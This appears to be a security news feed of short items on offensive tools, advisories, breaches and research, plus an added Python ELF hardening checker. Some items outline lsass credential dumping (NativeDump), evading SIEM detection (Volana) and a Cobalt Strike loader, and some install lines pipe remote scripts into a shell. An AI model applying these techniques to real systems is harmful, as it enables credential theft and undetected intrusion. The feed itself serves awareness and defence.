CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
CREATE DATABASE vuln_node_app_db;
GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
USE vuln_node_app_db;
CREATE TABLE users (id INT AUTO_INCREMENT PRIMARY...
http://www.kitploit.com/2024/06/vulnnodeapp-vulnerable-nodejs.html

XMGoat - Composed of XM Cyber terraform templates that help you learn about common Azure security issues
XM Goat is composed of XM Cyber Terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment with some significant misconfigurations. Your job is to attack and compromise the environments. Here's what to do for each environment: run the installation and then get started. With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png). If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md). When you're done learning the attack, clean up. Requirements: an Azure tenant; Terraform version 1.0.9 or above; Azure CLI; an Azure user with Owner permissions on the subscription and Global Admin...
http://www.kitploit.com/2024/06/xmgoat-composed-of-xm-cyber-terraform.html

Extrude - Analyse Binaries For Missing Security Features, Information Disclosure And More...
Analyse binaries for missing security features, information disclosure and more. Extrude is in the early stages of development, and currently only supports ELF and Mach-O binaries. PE (Windows) binaries will be supported soon. Usage:
extrude [flags] [file]
Flags:
-a, --all               Show details of all tests, not just those which failed.
-w, --fail-on-warning   Exit with a non-zero status even if only warnings are discovered.
-h, --help              Help for extrude
Docker: you can optionally run extrude with Docker via:
docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile
Supported checks. ELF: PIE, RELRO, BIND NOW, Fortified Source, Stack Canary, NX Stack. Mach-O: PIE, Stack Canary, NX Stack, NX Heap, ARC. Windows: coming soon... TODO: add support for PE; add secret scanning...
http://www.kitploit.com/2024/06/extrude-analyse-binaries-for-missing.html
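The ELF checks in the list above are mostly decided by the program headers and the dynamic section. As an added example, not Extrude's own code, the script below implements the PIE, NX-stack and RELRO/BIND_NOW checks for little-endian ELF64 images and builds synthetic ELF64 files inline so it runs offline; the stack-canary and FORTIFY checks need the dynamic symbol table (__stack_chk_fail, the *_chk imports) and are deliberately left out. The constant values are those of the ELF specification and the GNU extensions; the builder and its layout are assumptions made for the example.

```python
"""Added example, not Extrude's own code: the header-level ELF checks a tool of this
kind reports (PIE, NX stack, RELRO/BIND_NOW), run against ELF64 images constructed
inline so it works offline. Stack-canary and FORTIFY checks need the dynamic symbol
table and are not covered here."""
import struct
import sys

ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_DYNAMIC = 1, 2
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # Elf64_Ehdr, little-endian
PHDR = struct.Struct("<IIQQQQQQ")          # Elf64_Phdr
DYN = struct.Struct("<qQ")                 # Elf64_Dyn


def check_elf64(data: bytes) -> dict:
    """Return {'pie': bool, 'nx_stack': bool, 'relro': 'none'|'partial'|'full'}."""
    ident, e_type, _, _, _, e_phoff, _, _, _, phentsize, phnum, *_ = EHDR.unpack_from(data, 0)
    if ident[:4] != b"\x7fELF" or ident[4] != 2 or ident[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    stack_flags, has_relro, dyn_entries = None, False, []
    for i in range(phnum):
        p_type, p_flags, p_off, _, _, p_filesz, *_ = PHDR.unpack_from(data, e_phoff + i * phentsize)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            for off in range(p_off, p_off + p_filesz, DYN.size):
                tag, val = DYN.unpack_from(data, off)
                if tag == DT_NULL:
                    break
                dyn_entries.append((tag, val))
    # BIND_NOW can be expressed three ways by the linker; any of them makes RELRO full.
    bind_now = any(
        tag == DT_BIND_NOW
        or (tag == DT_FLAGS and val & DF_BIND_NOW)
        or (tag == DT_FLAGS_1 and val & DF_1_NOW)
        for tag, val in dyn_entries
    )
    # No PT_GNU_STACK at all means the loader falls back to an executable stack.
    nx_stack = stack_flags is not None and not stack_flags & PF_X
    relro = "full" if has_relro and bind_now else "partial" if has_relro else "none"
    # ET_DYN also covers shared libraries; for an executable it means PIE.
    return {"pie": e_type == ET_DYN, "nx_stack": nx_stack, "relro": relro}


def build_elf64(e_type, stack_flags, relro, bind_now) -> bytes:
    """Constructed test image: header, program headers and a minimal dynamic section."""
    tags = ([(DT_FLAGS, DF_BIND_NOW)] if bind_now else []) + [(DT_NULL, 0)]
    dyn = b"".join(DYN.pack(t, v) for t, v in tags)
    phdrs = [(PT_LOAD, PF_R | PF_X), (PT_DYNAMIC, PF_R | PF_W)]
    if stack_flags is not None:
        phdrs.append((PT_GNU_STACK, stack_flags))
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R))
    dyn_off = EHDR.size + PHDR.size * len(phdrs)
    body = b"".join(
        PHDR.pack(t, f, dyn_off if t == PT_DYNAMIC else 0, 0, 0,
                  len(dyn) if t == PT_DYNAMIC else dyn_off + len(dyn), 0, 0x1000)
        for t, f in phdrs
    )
    ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\0" * 7
    ehdr = EHDR.pack(ident, e_type, 0x3E, 1, 0, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, len(phdrs), 0, 0, 0)
    return ehdr + body + dyn


if __name__ == "__main__":
    if len(sys.argv) > 1:                      # a real binary from disk
        with open(sys.argv[1], "rb") as fh:
            print(check_elf64(fh.read()))
    else:                                      # the constructed images
        print("hardened:", check_elf64(build_elf64(ET_DYN, PF_R | PF_W, True, True)))
        print("weak:    ", check_elf64(build_elf64(ET_EXEC, PF_R | PF_W | PF_X, False, False)))
```

Point it at any 64-bit Linux binary to see the same three verdicts; the two constructed images show the fully hardened case (PIE, non-executable stack, full RELRO) beside the weak one (fixed address, RWX stack, no RELRO).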

Scanning for TP-Link Wifi Router Vulnerability Increases by 100%
The TP-Link Archer AX21 Wifi Router vulnerability CVE-2023-1389 experiences massive targeting along with a rather old critical RCE in PHPUnit.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-may-2024

KrebsOnSecurity Threatened with Defamation Lawsuit Over Fake Radaris CEO
On March 8, 2024, KrebsOnSecurity published a deep dive on the consumer data broker Radaris, showing how the original owners are two men in Massachusetts who operated multiple Russian language dating services and affiliate programs, in addition to a dizzying array of people-search websites. The subjects of that piece are threatening to sue KrebsOnSecurity for defamation unless the story is retracted. Meanwhile, their attorney has admitted that the person Radaris named as the CEO from its inception is a fabricated identity.
https://krebsonsecurity.com/2024/06/krebsonsecurity-threatened-with-defamation-lawsuit-over-fake-radaris-ceo/

Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models
https://googleprojectzero.blogspot.com/2024/06/project-naptime.html

Staying Safe with Chrome Extensions
Posted by Benjamin Ackerman, Anunoy Ghosh and David Warren, Chrome Security Team. Chrome extensions can boost your browsing, empowering you to do anything from customizing the look of sites to providing personalized advice when you're planning a vacation. But as with any software, extensions can also introduce risk. That's why we have a team whose only job is to focus on keeping you safe as you install and take advantage of Chrome extensions. Our team: Provides you with a personalized summary of the extensions you've installed. Reviews extensions before they're published on the Chrome Web Store. Continuously monitors...
http://security.googleblog.com/2024/06/staying-safe-with-chrome-extensions.html

BokuLoader - A Proof-Of-Concept Cobalt Strike Reflective Loader Which Aims To Recreate, Integrate, And Enhance Cobalt Strike's Evasion Features!
A proof-of-concept User-Defined Reflective Loader (UDRL) which aims to recreate, integrate, and enhance Cobalt Strike's evasion features! Contributors: Bobby Cooke (@0xBoku), project original author and maintainer; Santiago Pecin (@s4ntiago_p), reflective loader major enhancements; Chris Spehn (@ConsciousHacker), Aggressor scripting; Joshua Magri (@passthehashbrwn), IAT hooking; Dylan Tran (@d_tranman), reflective call stack spoofing; James Yeung (@5cript1diot), indirect system calls. UDRL usage considerations: the built-in Cobalt Strike reflective loader is robust, handling all Malleable PE evasion features Cobalt Strike has to offer. The major disadvantage of using a custom UDRL is that Malleable PE evasion features may or may not be supported out-of-the-box....
http://www.kitploit.com/2024/06/bokuloader-proof-of-concept-cobalt.html

Volana - Shell Command Obfuscation To Avoid Detection Systems
Shell command obfuscation to avoid SIEM/detection systems. During a pentest, an important aspect is to be stealthy. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log commands and send them to a SIEM in real time, making the after-the-fact cleanup alone useless. volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way you clear your tracks DURING your passage. Usage: you need to get an interactive shell (find a way to spawn it; you are a hacker, it's your job!). Then download it on the target machine and launch it. That's it, now you can type the commands you want to be stealthily executed. ## Download it from github release##...
http://www.kitploit.com/2024/06/volana-shell-command-obfuscation-to.html

New Google Chrome Warning—You Must Never Copy And Paste This Text

https://www.proofpoint.com/us/newsroom/news/new-google-chrome-warning-you-must-never-copy-and-paste-text

Microsoft Defender Experts for XDR recognized in the latest MITRE Engenuity ATT&CK® Evaluation for Managed Services
Microsoft Defender Experts for XDR delivered excellent results during round 2 of the MITRE Engenuity ATT&CK® Evaluations for Managed Services menuPass + ALPHV BlackCat. The post Microsoft Defender Experts for XDR recognized in the latest MITRE Engenuity ATT&CK® Evaluation for Managed Services appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/06/18/microsoft-defender-experts-for-xdr-recognized-in-the-latest-mitre-engenuity-attck-evaluation-for-managed-services/

CyberChef - The Cyber Swiss Army Knife - A Web App For Encryption, Encoding, Compression And Data Analysis
CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more. The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years. Live demo CyberChef is still under active development. As a result, it shouldn't be considered a finished product....
http://www.kitploit.com/2024/06/cyberchef-cyber-swiss-army-knife-web.html

New Diamorphine rootkit variant seen undetected in the wild
Introduction Code reuse is very frequent in malware, especially for those parts of the sample that are complex to develop or hard to write with an essentially different alternative code. By tracking both source code and object code, we efficiently detect new malware and track the evolution of existing malware in-the-wild.  Diamorphine is a well-known […] The post New Diamorphine rootkit variant seen undetected in the wild appeared first on Avast Threat Labs.
https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/?utm_source=rss&utm_medium=rss&utm_campaign=new-diamorphine-rootkit-variant-seen-undetected-in-the-wild

Analysis of user password strength
Kaspersky experts conducted a study of password resistance to attacks that use brute force and smart guessing techniques.
https://securelist.com/password-brute-force-time/112984/

Introducing Conkeyscan – Confluence Keyword Scanner
TL;DR Release of Conkeyscan – A Confluence Keyword/Secret Scanner, which is tailored towards pentesters. Secrets Everywhere Many companies, especially larger ones, need to store knowledge in a centralized way. A wiki is the usual choice for this. One product that is frequently used for this purpose is Confluence from Atlassian. Similar to how sensitive data […]
https://blog.compass-security.com/2024/06/introducing-conkeyscan-confluence-keyword-scanner/

Issue with DeepJavaLibrary - CVE-2024-37902
Publication Date: 2024/06/17 10:30 AM PDT AWS is aware of CVE-2024-37902, relating to a potential issue with the archive extraction utilities for DeepJavaLibrary (DJL). On May 15, 2024, we released version 0.28.0 to address this issue. If you are using an affected version (0.1.0 through 0.27.0), we recommend you upgrade to 0.28.0 or higher. For additional information, please refer to the DJL release notes. Security-related questions or concerns can be brought to our attention via aws-security@amazon.com.
https://aws.amazon.com/security/security-bulletins/AWS-2024-007/

Zadig & Voltaire - 586,895 breached accounts
In June 2024, a data breach sourced from French fashion brand Zadig & Voltaire was publicly posted to a popular hacking forum. The data included names, email and physical addresses, phone numbers and genders. When contacted about the incident, Zadig & Voltaire advised the incident had occurred more than 6 months ago and that "all measures were taken quickly".
https://haveibeenpwned.com/PwnedWebsites#ZadigVoltaire

GCP HMAC Keys are not discoverable or revokable other than for self
GCP administrators face challenges in managing HMAC keys within their organizations, lacking visibility into which user accounts have generated these keys and whether they are actively being used to access storage objects. Additionally, there's a lack of functionality to revoke keys associated with other users, restricting their ability to enforce security policies effectively. Similarly, GCP incident response teams rely on Cloud Logging to monitor Cloud Storage object access, but they lack specific indicators to determine if HMAC keys are being utilized in these access attempts.
https://www.cloudvulndb.org/gcp-hmac-keys-unauditable

NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)
NativeDump allows dumping the lsass process using only NTAPIs, generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List streams).
NtOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege.
RtlGetVersion to get the Operating System version details (major version, minor version and build number). This is necessary for the SystemInfo stream.
NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList stream.
NtOpenProcess to get a handle for the lsass process.
NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the...
http://www.kitploit.com/2024/06/nativedump-dump-lsass-using-only-native.html

Alleged Boss of ‘Scattered Spider' Hacking Group Arrested
A 22-year-old man from the United Kingdom arrested this week in Spain is allegedly the ringleader of Scattered Spider, a cybercrime group suspected of hacking into Twilio, LastPass, DoorDash, Mailchimp, and nearly 130 other organizations over the past two years.
https://krebsonsecurity.com/2024/06/alleged-boss-of-scattered-spider-hacking-group-arrested/

Driving forward in Android drivers
https://googleprojectzero.blogspot.com/2024/06/driving-forward-in-android-drivers.html

Security Challenges Introduced by Modern Software Development
Understand how modern software development is changing security threats.  
https://www.legitsecurity.com/blog/security-challenges-introduced-by-modern-software-development

Cinterion EHS5 3G UMTS/HSPA Module Research
We performed the security analysis of a Telit Cinterion modem in the course of a bigger project of security assessment of a popular model of a truck and found eight vulnerabilities.
https://securelist.com/telit-cinterion-modem-vulnerabilities/112915/

Time to challenge yourself in the 2024 Google CTF
Hlynur Gudmundsson, Software Engineer
It's Google CTF time! Install your tools, commit your scripts, and clear your schedule. The competition kicks off on June 21 2024 6:00 PM UTC and runs through June 23 2024 6:00 PM UTC. Registration is now open at goo.gle/ctf. Join the Google CTF (at goo.gle/ctf), a thrilling arena to showcase your technical prowess. The Google CTF consists of a set of computer security puzzles (or challenges) involving reverse-engineering, memory corruption, cryptography, web technologies, and more. Participants can use obscure security knowledge to find exploits through bugs and creative misuse, and with each completed challenge your team will earn points and move up through the ranks. The top 8 teams of the Google CTF will qualify for our Hackceler8 competition...
http://security.googleblog.com/2024/06/time-to-challenge-yourself-in-2024.html

NIST's International Cybersecurity and Privacy Engagement Update – Mexico City, RSA Conference, and More
The last few months have brought even more opportunities for NIST to engage with our international partners to enhance cybersecurity. Here are some updates on our recent international engagement: Conversations have continued with our partners throughout the world on the recent release of the Cybersecurity Framework Version 2.0 . NIST international engagement continues through our support to the Department of State and the International Trade Administration (ITA) during numerous international dialogues. Most recently, NIST participated in interagency dialogues to share information on NIST
https://www.nist.gov/blogs/cybersecurity-insights/nists-international-cybersecurity-and-privacy-engagement-update-mexico

Issue with Amazon EC2 VM Import Export Service
Publication Date: 2024/06/11 10:30 AM PDT
AWS is aware of an issue with the Amazon Elastic Compute Cloud (Amazon EC2) VM Import Export Service (VMIE). On April 12, 2024, we addressed this issue and can confirm new Windows OS imports are not affected. When using the EC2 VMIE service to import a VM using Windows OS, customers can optionally use their own Sysprep answer file. Before April 12, 2024, the EC2 VMIE service had an issue where, if a customer imported a VM using Windows OS to use as an AMI or instance, then an identical backup copy of the answer file would be created without sensitive data being removed if included in the file. This backup file is only accessible to on-instance Windows users who had permission to access the customer-provided answer file. For customers...
https://aws.amazon.com/security/security-bulletins/AWS-2024-006/

Issue with AWS Deployment Framework - CVE-2024-37293
Publication Date: 2024/06/11 09:00 AM PDT
AWS is aware of the issues described in CVE-2024-37293, relating to the open-source AWS Deployment Framework (ADF). These issues affect the bootstrap process that is responsible for deploying ADF's bootstrap stacks to facilitate multi-account cross-region deployments. The ADF bootstrap process relies on elevated privileges to perform this task. Two versions of the bootstrap process exist: a code-change driven pipeline using AWS CodeBuild and an event-driven state machine using AWS Lambda. If an actor has permissions to change the behavior of the CodeBuild project or the Lambda function, they would be able to escalate their privileges. We have addressed this issue in version 4.0 and above. We recommend that customers upgrade to the latest version...
https://aws.amazon.com/security/security-bulletins/AWS-2024-005/

QR code SQL injection and other vulnerabilities in a popular biometric terminal
The report analyzes the security properties of a popular biometric access control terminal made by ZKTeco and describes vulnerabilities found in it.
https://securelist.com/biometric-terminal-vulnerabilities/112800/

1-15 March 2024 Cyber Attacks Timeline
In the first timeline of March 2024, I collected 98 events, once again characterized by malware and ransomware attacks. State-sponsored threat actors were equally quite active, but the timeline also features some interesting events related to cyberwarfare.
https://www.hackmageddon.com/2024/06/10/1-15-march-2024-cyber-attacks-timeline/

Bypassing 2FA with phishing and OTP bots
Explaining how scammers use phishing and OTP bots to gain access to accounts protected with 2FA.
https://securelist.com/2fa-phishing/112805/

Sttr - Cross-Platform, Cli App To Perform Various Operations On String
sttr is command line software that allows you to quickly run various transformation operations on a string.
// With input prompt
sttr
// Direct input
sttr md5 "Hello World"
// File input
sttr md5 file.text
sttr base64-encode image.jpg
// Reading from a different process like cat, curl, printf etc.
echo "Hello World" | sttr md5
cat file.txt | sttr md5
// Writing output to a file
sttr yaml-json file.yaml > file-output.json
Demo
Installation
Quick install: You can run the below curl to install it somewhere in your PATH for easy use. Ideally it will be installed in the ./bin folder:
curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh
Webi, macOS / Linux:
curl -sS https://webi.sh/sttr | sh
Windows:
curl.exe https://webi.ms/sttr | powershell...
http://www.kitploit.com/2024/06/sttr-cross-platform-cli-app-to-perform.html

PIP-INTEL - OSINT and Cyber Intelligence Tool
Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface, simplifying the data collection and analysis processes for researchers and cybersecurity professionals. Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.
http://www.kitploit.com/2024/06/pip-intel-osint-and-cyber-intelligence.html

Oracle WebLogic Server Vulnerabilities (CVE-2023-21839, CVE-2017-3506)
What is the attack?
A threat actor known as “8220 Gang” has been seen exploiting two vulnerabilities in Oracle WebLogic Server: CVE-2017-3506, which allows remote OS command execution, and CVE-2023-21839, an insecure deserialization vulnerability. CISA recently added the Oracle WebLogic flaw tracked as CVE-2017-3506 to its Known Exploited Vulnerabilities catalog on 3 June 2023.
What is the recommended mitigation?
Apply the most recent patch released by Oracle. In the advisory, Oracle mentioned that they continue to receive reports of exploitation attempts.
What FortiGuard coverage is available?
FortiGuard customers remain protected by the IPS signatures available for both vulnerabilities. FortiGuard Outbreak Alert is available to review for full coverage and the FortiGuard Incident Response...
https://fortiguard.fortinet.com/threat-signal-report/5466

Don't Protect Your Software Supply Chain, Defend the Entire Software Factory
Find out why a too-narrow definition of "supply chain" may be hindering software security efforts. 
https://www.legitsecurity.com/blog/dont-protect-your-software-supply-chain-defend-the-entire-software-factory

February 2024 Cyber Attacks Statistics
In February 2024 I collected and analyzed 239 events. Cyber Crime continued to lead the Motivations chart with 68.6%. Operations driven by Cyber Espionage ranked at number two with 16.7%, ahead of Cyber Warfare (4.6%) and Hacktivism (3.3%).
https://www.hackmageddon.com/2024/06/04/february-2024-cyber-attacks-timeline/

Blockchain / Smart Contract Bugs
To identify and understand threats and weaknesses of smart contracts, it is important to be at least familiar with common smart contract bugs and vulnerabilities, how they can be leveraged by a malicious attacker, and how these issues can be mitigated. This blog article aims to raise awareness about common smart contract vulnerabilities and their corresponding mitigation strategies.
https://blog.compass-security.com/2024/06/blockchain-smart-contract-bugs/

Combolists Posted to Telegram - 361,468,099 breached accounts
In May 2024, 2B rows of data with 361M unique email addresses were collated from malicious Telegram channels. The data contained 122GB across 1.7k files with email addresses, usernames, passwords and in many cases, the website they were entered into. The data appears to have been sourced from a combination of existing combolists and info stealer malware.
https://haveibeenpwned.com/PwnedWebsites#TelegramCombolists

IT threat evolution in Q1 2024. Mobile statistics
Mobile malware statistics for Q1 2024: most common threats for Android, mobile banking Trojans, and ransomware Trojans.
https://securelist.com/it-threat-evolution-q1-2024-mobile-statistics/112750/

Check Point Quantum Security Gateways Information Disclosure Vulnerability (CVE-2024-24919)
What is the attack?
A zero-day vulnerability affecting Check Point Security Gateways is being exploited by attackers to gain remote access. The vulnerability can allow an attacker to read sensitive information on Check Point Security Gateways enabled with the Remote Access VPN or Mobile Access Software Blades. Check Point issued an advisory on Monday, warning that threat actors are actively targeting their Remote Access VPN devices in an ongoing campaign to infiltrate enterprise networks.
What is the recommended mitigation?
Check Point has released a hotfix for CVE-2024-24919 and extra measures that should be taken to mitigate the risks. FortiGuard recommends that users apply the emergency hotfix provided and follow the instructions in the vendor's advisory. https://support.checkpoint.com/results/sk/sk182336...
https://fortiguard.fortinet.com/threat-signal-report/5464

16-29 February 2024 Cyber Attacks Timeline
In the second timeline of February 2024 I collected 100 events characterized by a majority of malware and ransomware attacks and by a plethora of cyber espionage and cyber warfare campaigns.
https://www.hackmageddon.com/2024/05/30/16-29-february-2024-cyber-attacks-timeline/

Operation Endgame - 16,466,858 breached accounts
In May 2024, a coalition of international law enforcement agencies took down a series of botnets in a campaign they coined "Operation Endgame". Data seized in the operation included impacted email addresses and passwords which were provided to HIBP to help victims learn of their exposure.
https://haveibeenpwned.com/PwnedWebsites#OperationEndgame

NextGen Healthcare Mirth Connect RCE (CVE-2023-43208, CVE-2023-37679)
What is the vulnerability?
NextGen Healthcare Mirth Connect is vulnerable to unauthenticated remote code execution (CVE-2023-43208) caused by an incomplete patch of a command injection flaw (CVE-2023-37679). Mirth Connect is an open-source data integration platform widely used by healthcare companies. It enables the management of information using bi-directional sending of many types of messages. Attackers could exploit this vulnerability for initial access or to compromise sensitive healthcare data. CISA recently added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog on May 20th, 2024.
What is the recommended mitigation?
Users are advised to update to the latest version of NextGen Healthcare Mirth Connect as per the vendor's instructions.
What FortiGuard coverage...
https://fortiguard.fortinet.com/threat-signal-report/5460

Genesis Market Malware Attack
What is the attack?
The FortiGuard Lab's EDR team recently identified a malware infection exhibiting strong similarities to the previously reported Genesis Market malicious campaign that was dismantled by law enforcement in early 2023. The investigation traced some initial compromises to tools used for circumventing software licensing and counterfeit GPG MSI installers embedded with PowerShell scripts. Following the initial infection, the malware deploys a victim-specific DLL into the machine's memory. This malware targets Edge, Chrome, Brave, and Opera browsers by installing a "Save to Google Drive" extension, which it uses to steal login credentials and sensitive personal data.
What is Genesis Market?
Genesis Market is a black market that deals in stolen login credentials, browser cookies,...
https://fortiguard.fortinet.com/threat-signal-report/5461

On Fire Drills and Phishing Tests
Matt Linton, Chaos Specialist
In the late 19th and early 20th century, a series of catastrophic fires in short succession led an outraged public to demand action from the budding fire protection industry. Among the experts, one initial focus was on “Fire Evacuation Tests”. The earliest of these tests focused on individual performance and tested occupants on their evacuation speed, sometimes performing the tests “by surprise” as though the fire drill were a real fire. These early tests were more likely to result in injuries to the test-takers than any improvement in survivability. It wasn't until introducing better protective engineering - wider doors, push bars at exits, firebreaks in construction, lighted exit signs, and so on - that survival rates from building fires began to improve....
http://security.googleblog.com/2024/05/on-fire-drills-and-phishing-tests.html

Unfading Sea Haze: New Espionage Campaign in the South China Sea
Bitdefender researchers investigated a series of incidents at high-level organizations in countries of the South China Sea region, all performed by the same  threat actor we track as Unfading Sea Haze. Based on the victimology and the cyber-attack's aim, we believe the threat actor is aligned with China's interests. As tensions in the region rise, they are reflected in the intensification of activity on behalf of the Unfading Sea Haze actor, which uses new and improved tools and TTPs. We notice
https://www.bitdefender.com/blog/labs/unfading-sea-haze-new-espionage-campaign-in-the-south-china-sea/

Building DDoS Botnets with TP-Link and Netgear Routers
Threat actors double down with their botnet building efforts. Vulnerable Netgear routers join exploitable TP-Link and other IoT devices, expanding attacker DDoS capabilities.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-april-2024

Check Your Wallet? How Mobile Driver's Licenses are Changing Online Transactions
Can you recall the last time you opened a bank account? It's likely you walked into a local bank branch and spoke to a representative who asked for your driver's license and social security card to verify your identity. Now imagine you want to create a bank account online. The process is likely similar—type in your social security number, take a picture of your driver's license, and submit both to the bank via their webpage. Seems straightforward, right? Identity verification is important—it protects us from identity theft and reduces the risk of fraud and unauthorized access for organizations
https://www.nist.gov/blogs/cybersecurity-insights/check-your-wallet-how-mobile-drivers-licenses-are-changing-online

Securing the Gateway: Why Protecting Build Systems Is Crucial in Modern Software Development
Understand why securing build systems is as important as securing production systems.
https://www.legitsecurity.com/blog/why-protecting-build-systems-is-crucial-in-modern-software-development

How to become a Hacker
Introduction Last year, I attended a job fair organized by the Association of Computer Science Students at ETH Zürich. It was a rewarding experience to be able to share my day-to-day work in a field I am so passionate about. We got to talk to numerous students at different stages of their studies, as well […]
https://blog.compass-security.com/2024/05/how-to-become-a-hacker/

New Survey Finds a Paradox of Confidence in Software Supply Chain Security
Get results of and analysis on ESG's new survey on supply chain security. 
https://www.legitsecurity.com/blog/new-survey-finds-a-paradox-of-confidence-in-software-supply-chain-security

Internal Azure Container Registry writable via exposed secret
A Microsoft employee accidentally published credentials via a git commit to a public repository. These credentials granted privileged access to an internal Azure Container Registry (ACR) used by Azure, which reportedly held container images utilized by multiple Azure projects, including Azure IoT Edge, Akri, and Apollo. The privileged access could have allowed an attacker to download private images as well as upload new images and (most importantly) overwrite existing ones. In theory, an attacker could have leveraged the latter to implement a supply chain attack against these Azure projects and their users. However, it is currently unknown precisely which images this ACR contained or how they were used, so the effective impact of this issue remains undetermined.
https://www.cloudvulndb.org/azure-internal-acr-secret

I/O 2024: What's new in Android security and privacy
Posted by Dave Kleidermacher, VP Engineering, Android Security and Privacy Our commitment to user safety is a top priority for Android. We've been consistently working to stay ahead of the world's scammers, fraudsters and bad actors. And as their tactics evolve in sophistication and scale, we continually adapt and enhance our advanced security features and AI-powered protections to help keep Android users safe. In addition to our new suite of advanced theft protection features to help keep your device and data safe in the case of theft, we're also focusing increasingly on providing additional protections against mobile financial fraud and scams. Today, we're announcing more new fraud and scam protection features coming in Android 15 and Google Play services updates later this...
http://security.googleblog.com/2024/05/io-2024-whats-new-in-android-security.html

Notes on ThroughTek Kalay Vulnerabilities and Their Impact on the IoT Ecosystem
Since 2014, Bitdefender IoT researchers have been looking into the world's most popular IoT devices, hunting for vulnerabilities and undocumented attack avenues. This report documents four vulnerabilities affecting devices powered by the ThroughTek Kalay Platform. Due to the platform's massive presence in IoT integrations, these flaws have a significant downstream impact on several vendors. In the interconnected landscape of the Internet of Things (IoT), the reliability and security of devices,
https://www.bitdefender.com/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact/

Avast Q1/2024 Threat Report
Nearly 90% of Threats Blocked are Social Engineering, Revealing a Huge Surge of Scams, and Discovery of the Lazarus APT Campaign The post Avast Q1/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-q1-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q1-2024-threat-report

Verizon 2024 DBIR: Key Takeaways
Get key data points and takeaways from the 2024 Verizon Data Breach Investigations Report.
https://www.legitsecurity.com/blog/verizon-2024-dbir-key-takeaways

Google and Apple deliver support for unwanted tracking alerts in Android and iOS
Google and Apple have worked together to create an industry specification – Detecting Unwanted Location Trackers – for Bluetooth tracking devices that makes it possible to alert users across both Android and iOS if such a device is unknowingly being used to track them. This will help mitigate the misuse of devices designed to help keep track of belongings. Google is now launching this capability on Android 6.0+ devices, and today Apple is implementing this capability in iOS 17.5. With this new capability, Android users will now get a “Tracker traveling with you” alert on their device if an unknown Bluetooth tracking device is seen moving with them over time, regardless of the platform the device is paired with. If a user gets such an alert on their Android device, it means...
http://security.googleblog.com/2024/05/google-and-apple-deliver-support-for.html

Reel HackTheBox Walkthrough
Summary Reel is a windows Active Directory machine and is considered as a hard box in HTB. This box stands out for its uniqueness, featuring The post Reel HackTheBox Walkthrough appeared first on Hacking Articles.
https://www.hackingarticles.in/reel-hackthebox-walkthrough/

Latest NICE Framework Update Offers Improvements for the Cybersecurity Workforce
I joined NIST as the first full-time manager of the NICE Framework in October 2020, just one short month before NICE published the first revision NIST Special Publication 800-181, the NICE Workforce Framework for Cybersecurity (NICE Framework). That revision – far from finalizing work – was the starting point that led us to a complete refresh of the NICE Framework components, which includes: Revised Work Role Categories and Work Roles – including one new Work Role. Eleven new Competency Areas that extend the Framework's cybersecurity knowledge and skills. Updated Task, Knowledge, and Skill
https://www.nist.gov/blogs/cybersecurity-insights/latest-nice-framework-update-offers-improvements-cybersecurity

Exploiting Race Condition using Turbo Intruder
In web security, a race condition refers to a scenario where the behaviour of a web application is influenced by the sequence or timing of The post Exploiting Race Condition using Turbo Intruder appeared first on Hacking Articles.
https://www.hackingarticles.in/exploiting-race-condition-using-turbo-intruder/

1-15 February 2024 Cyber Attacks Timeline
In the cyber attacks timeline of February H1 2024, I collected 139 events dominated by malware attacks. Ransomware and vulnerabilities also played an important role in the threat landscape.
